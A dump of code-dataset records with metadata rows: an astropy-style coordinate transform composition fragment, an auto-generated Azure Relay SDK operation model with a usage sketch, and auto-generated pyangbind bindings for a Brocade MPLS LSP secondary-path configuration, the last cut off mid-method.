register_graph=register_graph)
if collapse_static_mats:
transforms = self._combine_statics(transforms)
self.transforms = tuple(transforms)
def _combine_statics(self, transforms):
newtrans = []
for currtrans in transforms:
lasttrans = newtrans[-1] if len(newtrans) > 0 else None
if (isinstance(lasttrans, StaticMatrixTransform) and
isinstance(currtrans, StaticMatrixTransform)):
combinedmat = np.dot(lasttrans.matrix, currtrans.matrix)
newtrans[-1] = StaticMatrixTransform(combinedmat,
lasttrans.fromsys,
currtrans.tosys)
else:
newtrans.append(currtrans)
return newtrans
def __call__(self, fromcoord, toframe):
curr_coord = fromcoord
for t in self.transforms:
# build an intermediate frame with attributes taken from either
# `fromframe`, or if not there, `toframe`, or if not there, use
# the defaults
# TODO: caching this information when creating the transform may
# speed things up a lot
frattrs = {}
for inter_frame_attr_nm in t.tosys.get_frame_attr_names():
if hasattr(toframe, inter_frame_attr_nm):
attr = getattr(toframe, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
elif hasattr(fromcoord, inter_frame_attr_nm):
attr = getattr(fromcoord, inter_frame_attr_nm)
frattrs[inter_frame_attr_nm] = attr
curr_toframe = t.tosys(**frattrs)
curr_coord = t(curr_coord, curr_toframe)
# this is safe even in the case where self.transforms is empty, because
        # coordinate objects are immutable, so copying is not needed
return curr_coord
# map class names to colorblind-safe colors
trans_to_color = OrderedDict()
trans_to_color[AffineTransform] = '#555555'  # gray
trans_to_color[FunctionTransform] = '#783001'  # dark red-ish/brown
trans_to_color[FunctionTransformWithFiniteDifference] = '#d95f02'  # red-ish
trans_to_color[StaticMatrixTransform] = '#7570b3'  # blue-ish
trans_to_color[DynamicMatrixTransform] = '#1b9e77'  # green-ish
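A self-contained miniature of the pattern above: register per-edge
transforms, then chain them along a path, as CompositeTransform does (toy
names and payloads; no astropy required; real transforms also receive the
target frame, which is mimicked here by passing ``tosys``):

from collections import defaultdict

graph = defaultdict(dict)                      # fromsys -> {tosys: transform}

class FrameA(object): pass
class FrameB(object): pass
class FrameC(object): pass

def register(fromsys, tosys, func, priority=1.0):
    func.priority = priority
    graph[fromsys][tosys] = func

register(FrameA, FrameB, lambda coord, frame: coord + ['A->B'])
register(FrameB, FrameC, lambda coord, frame: coord + ['B->C'])

# a "composite" transform is just the chain of per-edge transforms
path = [FrameA, FrameB, FrameC]
coord = []
for fromsys, tosys in zip(path[:-1], path[1:]):
    coord = graph[fromsys][tosys](coord, tosys)
print(coord)   # ['A->B', 'B->C']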
| true
| true
|
1c446d85e9321da7a48cf104ae990269b5592a7d
| 1,266
|
py
|
Python
|
sdk/relay/azure-mgmt-relay/azure/mgmt/relay/models/operation_py3.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 8
|
2021-01-13T23:44:08.000Z
|
2021-03-17T10:13:36.000Z
|
sdk/relay/azure-mgmt-relay/azure/mgmt/relay/models/operation_py3.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226
|
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/relay/azure-mgmt-relay/azure/mgmt/relay/models/operation_py3.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 2
|
2020-05-21T22:51:22.000Z
|
2020-05-26T20:53:01.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Operation(Model):
"""A Relay REST API operation.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: Operation name: {provider}/{resource}/{operation}
:vartype name: str
:param display: The object that represents the operation.
:type display: ~azure.mgmt.relay.models.OperationDisplay
"""
_validation = {
'name': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(self, *, display=None, **kwargs) -> None:
super(Operation, self).__init__(**kwargs)
self.name = None
self.display = display
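Usage sketch for the generated model, assuming msrest >= 0.5, where Model
gained the deserialize()/serialize()/as_dict() helpers:

op = Operation.deserialize({'name': 'Microsoft.Relay/namespaces/read'})
print(op.name)          # readonly: populated only when data comes from the server
print(op.serialize())   # {} -- readonly 'name' is omitted from request bodies
print(op.as_dict())     # keeps readonly fields by default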
| 31.65
| 76
| 0.584518
|
from msrest.serialization import Model
class Operation(Model):
_validation = {
'name': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(self, *, display=None, **kwargs) -> None:
super(Operation, self).__init__(**kwargs)
self.name = None
self.display = display
| true
| true
|
1c446daa36eb0e4b3800e1664e4e66ac001cceea
| 72,230
|
py
|
Python
|
pybind/slxos/v17r_2_00/mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v17r_2_00/mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/__init__.py
|
extremenetworks/pybind
|
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import lsp_traffic_engineering
import priority
import lsp_secpath_auto_bandwidth
class secondary_path(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /mpls-config/router/mpls/mpls-cmds-holder/lsp/secondary-path. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__secpath_name','__secpath_standby','__secpath_bfd','__secpath_cspf','__secpath_ipmtu','__lsp_adaptive','__lsp_reoptimize_timer','__lsp_commit','__lsp_record','__lsp_cos','__lsp_hop_limit','__lsp_cspf_computation_mode','__lsp_traffic_engineering','__priority','__lsp_exclude_any','__lsp_include_any','__lsp_include_all','__secpath_soft_preemption','__lsp_secpath_auto_bandwidth',)
_yang_name = 'secondary-path'
_rest_name = 'secondary-path'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__priority = YANGDynClass(base=priority.priority, is_container='container', presence=False, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'LSP setup and holding priority levels', u'cli-sequence-commands': None, u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_secpath_auto_bandwidth = YANGDynClass(base=lsp_secpath_auto_bandwidth.lsp_secpath_auto_bandwidth, is_container='container', presence=True, yang_name="lsp-secpath-auto-bandwidth", rest_name="autobw", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable Auto-bandwidth on secondary path', u'cli-full-no': None, u'callpoint': u'MplsLspSecPathAutoBandwidth', u'cli-full-command': None, u'cli-add-mode': None, u'alt-name': u'autobw', u'cli-mode-name': u'config-router-mpls-lsp-$(../../lsp-name)-secpath-$(../secpath-name)-autobw'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_cos = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..7']}), is_leaf=True, yang_name="lsp-cos", rest_name="cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure class of service', u'cli-full-no': None, u'alt-name': u'cos'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_include_all = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-all", rest_name="include-all", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include all of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-all'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_hop_limit = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="lsp-hop-limit", rest_name="hop-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Limit of hops the LSP can traverse', u'cli-full-no': None, u'alt-name': u'hop-limit'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint16', is_config=True)
self.__lsp_cspf_computation_mode = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'use-igp-metric': {'value': 1}, u'use-te-metric': {'value': 2}},), is_leaf=True, yang_name="lsp-cspf-computation-mode", rest_name="cspf-computation-mode", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Specify cspf-computation-mode', u'cli-full-no': None, u'alt-name': u'cspf-computation-mode'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='cspf-computation-mode', is_config=True)
self.__lsp_reoptimize_timer = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'300..65535']}), is_leaf=True, yang_name="lsp-reoptimize-timer", rest_name="reoptimize-timer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure Reoptimization timer', u'cli-full-no': None, u'alt-name': u'reoptimize-timer'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__secpath_ipmtu = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
self.__lsp_traffic_engineering = YANGDynClass(base=lsp_traffic_engineering.lsp_traffic_engineering, is_container='container', presence=False, yang_name="lsp-traffic-engineering", rest_name="traffic-engineering", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'LSP traffic engineering parameters', u'alt-name': u'traffic-engineering', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='container', is_config=True)
self.__lsp_commit = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-commit", rest_name="commit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Commit the changes to adaptive LSP', u'alt-name': u'commit', u'cli-suppress-no': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_soft_preemption = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-soft-preemption", rest_name="soft-preemption", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Set LSP soft preemption capability', u'cli-full-no': None, u'alt-name': u'soft-preemption'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__lsp_include_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-include-any", rest_name="include-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Include any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'include-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_exclude_any = YANGDynClass(base=TypedListType(allowed_type=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..256']})), is_leaf=False, yang_name="lsp-exclude-any", rest_name="exclude-any", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exclude any of the administrative groups', u'cli-full-no': None, u'cli-suppress-list-no': None, u'cli-full-command': None, u'cli-flat-list-syntax': None, u'alt-name': u'exclude-any'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_record = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="lsp-record", rest_name="record", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/disable recording path routes', u'cli-full-no': None, u'alt-name': u'record'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
self.__lsp_adaptive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-adaptive", rest_name="adaptive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Configure LSP/secpath to be adaptive', u'cli-full-no': None, u'alt-name': u'adaptive'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mpls-config', u'router', u'mpls', u'mpls-cmds-holder', u'lsp', u'secondary-path']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'router', u'mpls', u'lsp', u'secondary-path']
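  # Note: _path() yields the YANG schema path for this container, while
  # _rest_path() yields the REST/CLI path, honoring tailf 'alt-name'
  # aliases and skipping ancestors that have no rest-name of their own.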
def _get_secpath_name(self):
"""
Getter method for secpath_name, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_name (string)
"""
return self.__secpath_name
def _set_secpath_name(self, v, load=False):
"""
Setter method for secpath_name, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_name (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_name() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_name must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)""",
})
self.__secpath_name = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_name(self):
self.__secpath_name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="secpath-name", rest_name="secpath-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set secondary explicit path'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
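  # Pattern note: every YANG leaf in this container gets a generated
  # _get_<leaf>/_set_<leaf>/_unset_<leaf> triple like the one above; the
  # setter round-trips the value through YANGDynClass so that the type and
  # range restrictions from the YANG model are enforced on assignment, and
  # _unset_* restores the default (unset) dynamic class instance.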
def _get_secpath_standby(self):
"""
Getter method for secpath_standby, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_standby (empty)
"""
return self.__secpath_standby
def _set_secpath_standby(self, v, load=False):
"""
Setter method for secpath_standby, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_standby (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_standby is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_standby() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_standby must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_standby = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_standby(self):
self.__secpath_standby = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-standby", rest_name="standby", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Make secondary-path hot standby', u'alt-name': u'standby'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_bfd(self):
"""
Getter method for secpath_bfd, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_bfd (empty)
"""
return self.__secpath_bfd
def _set_secpath_bfd(self, v, load=False):
"""
Setter method for secpath_bfd, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_bfd (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_bfd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_bfd() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_bfd must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)""",
})
self.__secpath_bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_bfd(self):
self.__secpath_bfd = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="secpath-bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Enable bfd for secondary-path', u'hidden': u'full', u'alt-name': u'bfd'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='empty', is_config=True)
def _get_secpath_cspf(self):
"""
Getter method for secpath_cspf, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_cspf (enable-disable)
"""
return self.__secpath_cspf
def _set_secpath_cspf(self, v, load=False):
"""
Setter method for secpath_cspf, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_cspf (enable-disable)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_cspf is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_cspf() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_cspf must be of a type compatible with enable-disable""",
'defined-type': "brocade-mpls:enable-disable",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)""",
})
self.__secpath_cspf = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_cspf(self):
self.__secpath_cspf = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'enable': {'value': 1}, u'disable': {'value': 0}},), is_leaf=True, yang_name="secpath-cspf", rest_name="cspf", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Enable/Disable cspf', u'cli-full-no': None, u'alt-name': u'cspf'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='enable-disable', is_config=True)
def _get_secpath_ipmtu(self):
"""
Getter method for secpath_ipmtu, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_ipmtu (uint32)
"""
return self.__secpath_ipmtu
def _set_secpath_ipmtu(self, v, load=False):
"""
Setter method for secpath_ipmtu, mapped from YANG variable /mpls_config/router/mpls/mpls_cmds_holder/lsp/secondary_path/secpath_ipmtu (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_secpath_ipmtu is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_secpath_ipmtu() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """secpath_ipmtu must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'576..1526']}), is_leaf=True, yang_name="secpath-ipmtu", rest_name="ipmtu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'IP Packet Maximum Transmission Unit', u'cli-full-no': None, u'alt-name': u'ipmtu'}}, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)""",
})
self.__secpath_ipmtu = t
if hasattr(self, '_set'):
self._set()
def _unset_secpath_ipmtu(self):
